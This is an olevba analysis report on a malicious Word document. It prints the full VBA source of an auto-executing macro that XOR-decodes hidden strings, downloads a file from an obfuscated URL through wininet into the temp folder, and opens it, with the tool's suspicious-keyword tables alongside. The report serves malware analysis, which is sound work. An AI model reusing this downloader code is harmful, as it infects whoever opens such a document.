Malicious Word macro

1. olevba 0.25 - http://decalage.info/python/oletools
2. Flags Filename
3. ----------- -----------------------------------------------------------------
4. OLE:MASIHB- s22c-6~1.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: s22c-6~1.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15. Sub autoopen()
16. HLOPHLOP32
17. End Sub
18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
19. ANALYSIS:
20. +----------+----------+---------------------------------------+
21. | Type | Keyword | Description |
22. +----------+----------+---------------------------------------+
23. | AutoExec | AutoOpen | Runs when the Word document is opened |
24. +----------+----------+---------------------------------------+
25. -------------------------------------------------------------------------------
26. VBA MACRO Module4.bas
27. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module4'
28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
29. (empty macro)
30. -------------------------------------------------------------------------------
31. VBA MACRO Module11.bas
32. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module11'
33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
34. (empty macro)
35. -------------------------------------------------------------------------------
36. VBA MACRO Module1.bas
37. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module1'
38. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
39. ' (File name: AddNewSheet.bas)
40. ' Author: SENOO, Ken
41. ' LICENSE: CC0
42. ' (Last update: 2015-03-10T18:38+09:00)
43.  
44. Sub AddNewSheet(sheet_name)
45.  
46. ' ?????????????????
47. For Each ws In Worksheets
48. If ws.Name = sheet_name Then
49. Application.DisplayAlerts = False
50. ws.Delete
51. Application.DisplayAlerts = True
52. End If
53. Next ws
54.  
55. ' ????????????
56. Sheets.Add(After:=ActiveSheet).Name = sheet_name
57.  
58. End Sub
59. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
60. ANALYSIS:
61. No suspicious keyword or IOC found.
62. -------------------------------------------------------------------------------
63. VBA MACRO UFO.frm
64. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/UFO'
65. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
66. (empty macro)
67. -------------------------------------------------------------------------------
68. VBA MACRO Class1.cls
69. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Class1'
70. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
71. (empty macro)
72. -------------------------------------------------------------------------------
73. VBA MACRO Module3.bas
74. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module3'
75. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
76. Option Explicit
77.  
78.  
79. Private Const API333333 = 8162
80. Private Const API33333 As String = "API33333"
81. Private Const API3333 = 1
82. Private Const API333 = &H4000000
83. Public Function API22222(ByVal sURL As String, ByVal sFileName As String) As Boolean
84. #If VBA7 And Win64 Then
85. Dim API2222 As LongPtr, API3333333 As LongPtr
86. #Else
87. Dim API2222 As Long, API3333333 As Long
88. #End If
89. Dim API2 As Long
90. Dim API222 As String * API333333, API33333333 As String
91. Dim API22 As Integer, dData As Double
92. API2222 = API22222222(API33333, API3333, vbNullString, vbNullString, 0)
93. If API2222 = 0 Then
94. Exit Function
95. End If
96. API3333333 = API222222(API2222, sURL, vbNullString, 0, API333, 0)
97. If API3333333 = 0 Then
98. dData = 0
99. Else
100. API2222222 API3333333, API222, API333333, API2
101. API33333333 = API222
102. Do While API2 <> 0
103. API2222222 API3333333, API222, API333333, API2
104. API33333333 = API33333333 + Mid(API222, 1, API2)
105. Loop
106. dData = Len(API33333333): API22 = FreeFile
107. Open sFileName For Binary Access Write Lock Write As #API22
108. Put #API22, , API33333333: Close #API22
109. End If
110. API222222222 API3333333
111. API222222222 API2222
112. API33333333 = ""
113. If dData Then
114. API22222 = True
115. End If
116. End Function
117. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
118. ANALYSIS:
119. +------------+----------------+-----------------------------------------+
120. | Type | Keyword | Description |
121. +------------+----------------+-----------------------------------------+
122. | Suspicious | Open | May open a file |
123. | Suspicious | Write | May write to a file (if combined with |
124. | | | Open) |
125. | Suspicious | Put | May write to a file (if combined with |
126. | | | Open) |
127. | Suspicious | Binary | May read or write a binary file (if |
128. | | | combined with Open) |
129. | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
130. | | | be used to obfuscate strings (option |
131. | | | --decode to see all) |
132. | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
133. | | | may be used to obfuscate strings |
134. | | | (option --decode to see all) |
135. +------------+----------------+-----------------------------------------+
136. -------------------------------------------------------------------------------
137. VBA MACRO Module2.bas
138. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module2'
139. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
140. (empty macro)
141. -------------------------------------------------------------------------------
142. VBA MACRO Module5.bas
143. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module5'
144. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
145. Private Const X11111111 = "1E25282121630C3D3D21242E5246242223"
146. Private Const X1111111 = "111D0C0120243E2E7F637863011C283528"
147. Private Const X111111 = "2539393D77626229222A223F575B2863292862273E622F242363284B57"
148. Private Const X11111 = "1E2E3F243D3924232A630B245F571E343E392820022F27282E39"
149. Private Const X1111 = "MMMMMMMMMMMMM32"
150.  
151.  
152.  
153.  
154.  
155.  
156. Sub HLOPHLOP32()
157. '* NAPIDPAOJMXNH55
158. Dim T111111111111111 _
159. As Long
160. For T111111111111111 = _
161. 3 To 10
162. If Not T111111111111111 = 14 _
163. Then Exit For
164. Next T111111111111111
165. Dim X111
166. Set X111 = CreateObject _
167. (STOP7777777777 _
168. (X1111, X11111))
169. Dim X11
170. Const X11ID = 2
171. Dim T11111111111111 As Integer
172. For T11111111111111 = 0 To 0
173. If T11111111111111 = 5 Then End
174. Next T11111111111111
175. Set X11 = X111.GetSpecialFolder _
176. (X11ID)
177. Dim T1111111111111 As Integer
178. For T1111111111111 = 0 To 0
179. If T1111111111111 = 5 Then End
180. Next T1111111111111
181. X1 = X11 & STOP7777777777 _
182. (X1111, X1111111)
183. Dim T111111111111 As Integer
184. For T111111111111 = 0 To 0
185. If T111111111111 = 5 Then End
186. Next T111111111111
187. Set X111 = CreateObject _
188. (STOP7777777777 _
189. (X1111, X11111))
190. Dim T11111111111 As Integer
191. For T11111111111 = 0 To 0
192. If T11111111111 = 5 Then End
193. Next T11111111111
194. If X111.FileExists _
195. (X1) Then
196. X111. _
197. DeleteFile X1
198. End If
199. If API22222(STOP7777777777 _
200. (X1111, X111111), X1) Then
201. End If
202. Set SSSS = Nothing
203. If X111. _
204. FileExists _
205. (X1) Then
206. End If
207. Set SASASA = CreateObject _
208. (STOP7777777777 _
209. (X1111, X11111111))
210. SASASA.Open X1
211. End Sub
212.  
213.  
214.  
215.  
216.  
217.  
218. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
219. ANALYSIS:
220. +------------+--------------+-----------------------------------------+
221. | Type | Keyword | Description |
222. +------------+--------------+-----------------------------------------+
223. | Suspicious | CreateObject | May create an OLE object |
224. | Suspicious | Open | May open a file |
225. | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
226. | | | be used to obfuscate strings (option |
227. | | | --decode to see all) |
228. +------------+--------------+-----------------------------------------+
229. -------------------------------------------------------------------------------
230. VBA MACRO Module6.bas
231. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module6'
232. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
233. Option Explicit
234.  
235. #If VBA7 And Win64 Then
236. Public Declare PtrSafe Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
237. Public Declare PtrSafe Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
238. Public Declare PtrSafe Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As LongPtr, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
239. Public Declare PtrSafe Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
240. #Else
241. Public Declare Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
242. Public Declare Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
243. Public Declare Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As Long, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
244. Public Declare Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
245. #End If
246.  
247.  
248. Public Function STOP7777777777(STOP777777777 As String, STOP77777777 As String) As String
249. Dim asasas1 As Long
250. Dim asasas1O As String
251. Dim asasas10 As Integer
252. Dim asasas101 As Integer
253. For asasas1 = 1 To (Len(STOP77777777) / 2)
254. asasas10 = Val("&H" & (Mid$(STOP77777777, (2 * asasas1) - 1, 2)))
255. asasas101 = Asc(Mid$(STOP777777777, ((asasas1 Mod Len(STOP777777777)) + 1), 1))
256. asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
257. Next asasas1
258. STOP7777777777 = asasas1O
259. End Function
260. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
261. ANALYSIS:
262. +------------+----------------+-----------------------------------------+
263. | Type | Keyword | Description |
264. +------------+----------------+-----------------------------------------+
265. | Suspicious | Lib | May run code from a DLL |
266. | Suspicious | Chr | May attempt to obfuscate specific |
267. | | | strings |
268. | Suspicious | Xor | May attempt to obfuscate specific |
269. | | | strings |
270. | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
271. | | | be used to obfuscate strings (option |
272. | | | --decode to see all) |
273. | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
274. | | | may be used to obfuscate strings |
275. | | | (option --decode to see all) |
276. | IOC | wininet.dll | Executable file name |
277. +------------+----------------+-----------------------------------------+